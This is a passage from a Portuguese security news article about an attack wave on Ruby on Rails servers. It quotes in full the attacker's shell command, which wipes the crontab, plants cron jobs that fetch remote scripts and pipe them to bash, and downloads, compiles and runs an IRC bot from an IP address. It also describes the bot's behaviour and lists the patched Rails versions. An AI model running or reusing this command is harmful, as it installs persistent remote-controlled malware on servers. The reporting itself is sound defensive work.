Código :
crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k
Dentre outras coisas, isso permite que o bot seja baixado pelo servidor invadido, e então compilado e executado. O especialista em segurança também incluiu o código fonte desse bot em seu blog. O "k" (como é conhecido) tenta contactar um servidor IRC hospedado no domínio cvv4you.ru e então participa do canal #rails nesse servidor IRC. Lá, o bot irá aguardar por instruções. Jarmoc afirma que o "k" pode ser instruído para baixar e executar código arbitrário. Atualmente o servidor IRC correspondente se encontra indisponível... pelo menos nesse endereço.
A título de identificação, o bot aparece na lista de processo como "– bash". Quando executado, o mesmo cria um arquivo chamado /tmp/tan.pid para garantir que apenas uma instância do bot seja executada. Para aqueles que rodam um servidor com Ruby on Rails precisam sempre ter a certeza de que a versão corrente mais atual está instalada. As versões correntes (que corrigem essa brecha de segurança) do Ruby on Rails são 3.2.13, 3.1.12 e 2.3.18.
Saiba Mais:
- Heise Online: Attack wave on Ruby on Rails (em Inglês)